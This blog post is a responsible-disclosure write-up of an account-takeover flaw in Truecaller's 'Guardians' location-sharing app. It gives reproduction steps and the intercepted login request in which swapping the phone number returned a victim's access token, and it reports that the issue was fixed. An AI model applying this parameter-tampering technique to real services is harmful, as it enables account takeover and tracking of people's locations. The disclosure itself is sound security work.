How we could have tracked anyone's live location using Truecaller's "Guardians" app
Bug Bounty Research

How we could have tracked anyone's live location using Truecaller's "Guardians" app

March 9, 2021

Truecaller has recently launched a new application named "Guardians," a safety app that lets users share their live location permanently with Guardians that they have chosen from their contacts.
If you are using this application, your selected contacts are supposed to track your location in real-time.  You can also choose to accept help from "Community Guardians," who will get your location after you tap the emergency button. The sign-in process is quite simple for Truecaller users with a single tap.

Summary:
It was possible for an attacker to login into a victim's "Guardians"  account by just using their phone number. Once the attacker has successfully logged in, they can track all your family member's locations. The application also leaked the victim's account details such as date of birth, profile picture, and emergency contact details. It also allowed an attacker to add more family members to the account once the account is taken over. Truecaller was quick in fixing the reported vulnerability within few hours.


Vulnerability Details:
This vulnerability existed in "Log in with Truecaller" option in the "Guardians" application. By Intercepting the Login API request, the attacker could have changed "number" parameter to victim's number keeping all other parameter's value to their and forwarding the API request. The API responded with a valid access token of the victim in response headers.

Steps to Reproduce:
1) Install Truecaller's Guardian's application into your Phone.
2) Start Intercepting application's traffic in Burp Suite Proxy.
3) Click on "Login with Truecaller" option and change the "number" parameter's to victim's phone number, and don't modify any other values in the response.
4) You will be logged in to the victim's account.


Vulnerable Request:


POST /v0/user HTTP/1.1
Host: api.getguardians.com
Content-Type: application/json
Accept: */*
Connection: close
Content-Length: 656
User-Agent: Guardians/1.1.3 (com.truesoftware.Guardians; build:1.1.3; iOS 14.4.0) Alamofire/5.4.1
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Authorization: Bearer aQ4AOdxwPPWJM06sICQMQRWlANOC1crV
Accept-Encoding: gzip, deflate
{
 "userVerificationInput": {
   "nonTCUserToken": "",
   "tcUserSignature": "[attacker's Signature]",
   "tcUserPayload": "[Attacker's Payload]"
 },
 "phoneNumber": {
   "countryCode": "IN",
   "number": "[victim'sPhoneNumber]"
 },
 "tcUser": true,
 "ios": true
}


Response:


HTTP/1.1 200 OK
x-auth-token: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOxxxxxx [Victim's Authorisation token]
content-type: application/json
Content-Length: 65
x-envoy-upstream-service-time: 5
server: istio-envoy
Via: 1.1 google
Alt-Svc: clear
Connection: close
{
 "userID": "xx-xxx-xxx-xxxx-xxx",
 "existing": true
}


Timelines:
March 4th, 2021 1:57 PM IST - Reported to Truecaller's Responsible Disclosure Program
March 4th, 2021 3:24 PM IST- Issue Acknowledged by Truecaller
March 5th, 2021 8:46 PM IST - Emailed Truecaller for an update.
March 6th, 2021 12:04 PM IST - Truecaller confirms that the team has fixed the issue.


This type of vulnerability is categorized as "Insecure Direct Object Reference". Companies tend to miss out on such fundamental issues even after rigorous security assessments. The repercussions of such problems are enormous and impact customers' privacy and lead to companies' revenue losses.
Read more: https://www.pingsafe.ai

Other blog posts